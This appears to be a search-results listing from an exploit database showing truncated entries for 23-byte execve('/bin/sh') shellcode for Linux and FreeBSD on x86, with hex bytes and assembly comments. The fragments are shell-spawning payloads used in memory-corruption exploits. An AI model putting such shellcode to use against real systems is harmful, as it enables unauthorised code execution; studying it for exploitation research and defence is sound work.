23 matches found
linux/x86 execve(/bin/sh) / PUSH - 23 bytes
Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve/bin/sh / PUSH - 23 bytes =========================================== / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb...
linux/x86 execve code 23 bytes
No description provided by source. / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f / "\x89\xe3" / mov %esp,%ebx / "\x52" / push...
freebsd/x86 execve /bin/sh 23 bytes 2
freebsd/x86 execve /bin/sh 23 bytes. Shellcode exploit for freebsdx86 platform / FreeBSD 23 byte execve code. Greetz to anathema, the first who published this way of writing shellcodes. greetz to preedator marcetam [email protected] / char fbsdexecve= "\x99" / cdq / "\x52" / push %edx /...